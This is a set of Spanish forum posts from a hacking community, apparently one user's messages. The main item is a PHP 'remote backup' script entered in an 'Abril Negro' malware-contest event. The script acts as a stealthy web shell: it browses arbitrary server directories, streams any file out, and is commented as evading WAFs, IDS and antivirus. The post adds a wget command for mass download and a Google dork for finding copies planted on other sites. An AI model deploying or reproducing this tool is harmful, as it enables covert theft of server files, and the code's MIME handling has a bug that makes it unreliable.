Mensajes

Solo herramientas para romper windows? y las de linux, unix, etc?

El tema esta bastante bueno, pero faltan muchísimas mas que no aparecen ahí, como por ejemplo las herramientas de desbloqueo de móviles a través de explotaciones del sistema operativo y del cargador, herramientas de espionaje de señales móviles, herramientas de acceso a bases de datos y eliminación masiva de compañias que lo permiten tales como microsoft, facebook y rapidshare, las herramientas y malwares tipo backdoor creadas por las grandes compañias de tecnología, tampoco menciona el acceso a los codigos fuentes de los distintos sistemas operativos.... vamos, es la nsa no un grupo pequeño de hackers aficionados, las herramientas que explica wikileaks no deben ser ni el 10% de todo lo que realmente utilizan, sin mencionar los backdoors a modo de vulnerabilidades que en conjunto con las grandes compañías, las van dejando abiertas hasta que son publicadas por terceros.

Para hacer un cliente ssh web vas a tener algunos inconvenientes, por ejemplo no basta solamente con poder conectarse a un servidor ssh, también tienes que interactuar en tiempo real
mientras la persona escribe el servidor puede enviar mensajes y mientra recibe mensajes debe ser capaz de enviar.

Lo que tu necesitas es un pipe en bash al ssh o un pipe ssh manipulando los procesos del sistema a menos que lo quieras hacer de manera directa utilizando otras librerías, pero tendrás problemas de compatibilidad entre las diferentes versiones.

Para lograr comunicarte con un servidor y poder enviar y recibir información en tiempo real necesitas utilizar websockets y procesos asyncronicos y en php te va a costar bastante hacerlo.

Resulta mucho mas fácil hacerlo en nodejs.

Ahora, ya existe algo similar, hay un complemento para Google Chrome el cual te da un bash con ssh y es compatible en linux, windows y mac:

https://chrome.google.com/webstore/detail/termius-ssh-client/fjcdjmmkgnkgihjnlbgcdamkadlkbmam?utm_source=chrome-ntp-icon
https://chrome.google.com/webstore/detail/rightscale-ssh/pfmkeekfkpfecccgbliieogmgmijklpm?utm_source=chrome-ntp-icon

Acá hay enlaces útiles:

http://kvz.io/blog/2007/07/24/make-ssh-connections-with-php/
http://php.net/manual/en/book.ssh2.php
http://socketo.me/
http://www.phpbuilder.com/articles/application-architecture/optimization/creating-real-time-applications-with-php-and-websockets.html
https://www.npmjs.com/package/simple-ssh
https://www.npmjs.com/package/node-ssh
https://www.npmjs.com/package/ssh-exec
https://www.npmjs.com/package/websocket
https://carlosazaustre.es/blog/websockets-como-utilizar-socket-io-en-tu-aplicacion-web/

Saludos.

Hola usuarios! comenzó Abril Negro!, un evento donde puedes demostrar ser el mejor, este mes en este subforo no hay censura! (siempre y cuando lo que se postee tenga relación con abril negro).

Los esperamos a todos:

http://foro.elhacker.net/abril_negro/abril_negro_2017-t464563.0.html

El evento ya comenzó!!

Genial! se ve bastante bien

Super!, no se ve mal.

Asi es, pero en este caso están hablando de lo que se ejecuta del lado del navegador en tecnologia web, c# se ejecuta del lado de la maquina no del navegador y delphi lo mismo.

Acá va el mio!

http://foro.elhacker.net/abril_negro/wfilebackup_respaldador_de_archivos_remoto_automatizado-t467596.0.html

w.filebackup

Hola, hace unos 3 o 4 años atrás hice un script en php, lo que hace es disponerse para hacer un respaldo de todos los archivos del servidor sin tener las limitaciones de tamaño.


¿Cómo funciona?

* No comprime para descargar un solo comprimido, esto previene el uso de disco cuando hay poco espacio.
* Descargar archivo por archivo de manera recursiva, esto previene problemas de termino de ejecución por tiempo fuera cuando el archivo es muy grande.
* Utiliza streaming byte por byte, esto previene el uso desmedido de memoria ram cuando necesitas descargar archivos muy grandes.
* No es detectado por la mayoría de los Firewalls o WAF, gracias a que utiliza enlaces permanentes de apache, así previene el envío de parámetros.


¿Cómo lo ejecuto?

Primeramente, subes el script a un servidor web, por ejemplo http://example.com/w.filebackup.php , ahora cuando veas el script desde el navegador se verá igual que la navegación de archivos de apache, con la diferencia de que no interpretará nada, solo descargará. Ahora, basta con realizar una descarga recursiva con wget y tendrás la descarga de todo el servidor:

Código [Seleccionar] Expandir

wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php

Enjoy y Feliz Abril Negro!

Código (php) [Seleccionar] Expandir

<?php
/* w.filebackup.php V1.0 for Administrators by WHK
 *
 * Email: whk@elhacker.net
 * Website: http://whk.elhacker.net/
 * 
 * Uso Bash:
 * --------
 *  mkdir page && cd page
 *  wget -r -x -nH -np --cut-dirs=1 --no-check-certificate --post-data 'token=1' -e robots=off -U 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02011-10-16' http://example.com/w.filebackup.php
 *  rm -rf w.filebackup.php*
 * 
 * Uso WEB:
 * --------
 * http://web.page/w.filebackup.php
 * 
 * Al enviar la variable "token" via HTTP/POST restringe la visualización
 * de los directorios hasta la ruta actual del script, esto evita que el
 * respaldo salga fuera del directorio planeado y cause una sobrecarga.
 * Solo utilizar sin esta variable en caso de querer hacer una backup
 * extrema con mucho tiempo libre.
 * 
 * GoogleDork:
 * ----------
 * inurl:".php?do=/" + intitle:"index of"
 * 
 * Legal:
 * -----
 * Uso esclusivo sobre servidores propios, nunca utilizar en servidores sin el consentimiento del administrador.
 * El usuario es totalmente responsable de su utilización.
 * En caso de no aceptar este acuerdo no debe ser utilizado.
 * 
 * Compatible:
 * ----------
 * Este Script es compatible con servidores con safe mode en ON, servidores sin
 * zlib, sin gz, servidores que no tienen acceso a la shell del sistema, servdiores
 * con mod evasive y mod security, servdiores con firewalls y Antivirus antiShells.
 * No se asegura su funcionalidad al 100% debido a posibles reglas de protección que
 * impidan su normal funcionamiento.
 */
if($getPath = substr($_SERVER['PHP_SELF'], strlen($_SERVER['SCRIPT_NAME']))){

/* Procesa el archivo */
if(is_file($getPath)){

/* Obtiene el tipo MIME */
if(function_exists('mime_content_type')) {
$mime = mime_content_type($getPath);
}elseif(function_exists('finfo_file')){
$info = finfo_open(FILEINFO_MIME);
$mime = finfo_file($info, $getPath);
finfo_close($info);
}
if(!$type)
$mime = 'application/force-download';
/* Establece las cabeceras */
header('Content-Type: '.$mime);
header('Content-Disposition: attachment; filename='.basename($getPath));
header('Content-Transfer-Encoding: binary');
header('Content-Length: '.filesize($getPath));
/* Hacia el infinito y mas allá! */
if(!@ini_get('safe_mode'))
@set_time_limit(0);
/* readfile($getPath); que sucede cuando el archivo es mas grande que 
 * la capacidad de memoria ram asignada en php.ini como un iso, un gz
 * con una backup de cpanel o un video? */
if($handle = fopen($getPath, 'r')){

/* utiliza bloques de 4kb en modo binario para no corromper el
 * contenido a descargar y evitar el uso desmedido de la memoria ram
 * y evitar el activado de alarmas de IDS y Firewalls */
while(($buffer = fgets($handle, 4096)) !== false)
echo $buffer;
fclose($handle);
}
exit;
/* Procesa el directorio */
}elseif(is_dir($getPath)){
$absolutePath = $getPath;
/* Si no es archivo ni directorio que es? */
}else /* 404 */
$err = 'File not found or access denied ( '.$getPath.' ).';
}
/* Utiliza variables que no sean tan fáciles de incluir en un
 * mod security o alguna regla del firewall (do es utilizado
 * por vbulletin). */
if(isset($_GET['do']) and (is_dir($_GET['do'])))
$absolutePath = $_GET['do'];
if((!isset($absolutePath)) or (!$absolutePath))
$absolutePath = dirname(__file__).'/';
/* Restringe la URL si se solicita */
if(isset($_POST['token']) and (strlen($absolutePath) < strlen(dirname(__file__).'/')))
$absolutePath = dirname(__file__).'/';
$items = array(
'glob' => array(),
'folders' => array(),
'files' => array()
);
// if($items['glob'] = glob($absolutePath.'*')){ glob() no encuentra los archivos ocultos como .htaccess
if($items['glob'] = scandir($absolutePath)){
foreach($items['glob'] as $item){
if(!in_array($item, array('.','..'))){
if(is_dir($absolutePath.$item))
$items['folders'][] = $absolutePath.$item.'/';
else
$items['files'][] = $absolutePath.$item;
}
unset($item);
}
}
unset($items['glob']);
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></title>
</head>
<body>
<h1>Index of <?php echo htmlspecialchars($absolutePath, ENT_QUOTES); ?></h1>
<?php if(isset($err)){ ?>
<p><b><i><?php echo htmlspecialchars($err, ENT_QUOTES); ?></i></b></p>
<?php } ?>

<ul>
<?php if(!isset($_POST['token'])){ ?>
<li>
<a href="<?php echo $_SERVER['SCRIPT_NAME'].dirname(substr($absolutePath, 0, -1)); ?>/"> Parent Directory</a>
</li>
<?php } ?>

<?php if($items['files']){ ?>
<?php foreach($items['files'] as $file){ ?>
<li>
<a href="<?php echo $_SERVER['SCRIPT_NAME'].$file; ?>"> <?php echo htmlspecialchars(basename($file), ENT_QUOTES); ?></a>
</li>
<?php } ?>
<?php } ?>

<?php if($items['folders']){ ?>
<?php foreach($items['folders'] as $folder){ ?>
<li>
<a href="<?php echo $_SERVER['SCRIPT_NAME'].'?do='.urlencode($folder); ?>"><?php echo htmlspecialchars(basename($folder), ENT_QUOTES); ?>/</a>
</li>
<?php } ?>
<?php } ?>

</ul>

<address>
<?php echo htmlspecialchars($_SERVER['SERVER_SOFTWARE'], ENT_QUOTES); ?> Server
at <?php echo htmlspecialchars($_SERVER['HTTP_HOST'], ENT_QUOTES); ?>
Port <?php echo (int)$_SERVER['SERVER_PORT']; ?>
</address>
</body>
</html>

<?php
/* Evita la ejecución arbitraria por un LFI o <preppendfile> */
exit;


Mirror: https://github.com/WHK102/w.filebackup/blob/master/w.filebackup.php

Hey! no se ve mal, a mucha gente le servirá para comprender este tipo de técnicas, que a pesar de lo simple y antiguas que parezcan, aun son muy efectivas.

Saludos!